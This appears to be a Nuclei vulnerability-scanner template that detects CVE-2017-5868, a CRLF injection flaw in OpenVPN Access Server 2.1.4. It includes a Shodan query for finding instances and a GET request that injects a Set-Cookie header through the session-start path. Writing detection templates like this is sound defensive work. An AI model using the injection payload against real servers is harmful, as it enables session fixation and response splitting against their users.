CVE-2017-5868: OpenVPN Access Server 2.1.4 - CRLF Injection

id: CVE-2017-5868

info:
  name: OpenVPN Access Server 2.1.4 - CRLF Injection
  author: ritikchaddha
  severity: medium
  description: |
    CRLF injection vulnerability in the web interface in OpenVPN Access Server 2.1.4 allows remote attackers to inject arbitrary HTTP headers and consequently conduct session fixation attacks and possibly HTTP response splitting attacks via "%0A" characters in the PATH_INFO to __session_start__/.
  reference:
    - https://www.openwall.com/lists/oss-security/2017/05/23/13
    - http://www.securitytracker.com/id/1038547
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5868
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-5868
    cwe-id: CWE-93
    epss-score: 0.08462
    epss-percentile: 0.92021
    cpe: cpe:2.3:a:openvpn:openvpn_access_server:2.1.4:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: openvpn
    product: openvpn_access_server
    shodan-query: cpe:"cpe:2.3:a:openvpn:openvpn_access_server"
  tags: cve,cve2017,openvpn,crlf,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/__session_start__/%0aSet-Cookie:%20crlfinjection=1;"

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - "^Set-Cookie: crlfinjection=1;"

      - type: status
        status:
          - 302
# digest: 4b0a00483046022100b8ad47dc363090f5f531fa45e6fba87474815b9f37312f159772352809c69713022100d04f41e8434d527726becff11c3c315f9ee96df63829e15f3a9eaf8f874cb593:922c64590222798bb761d5b6d8e72950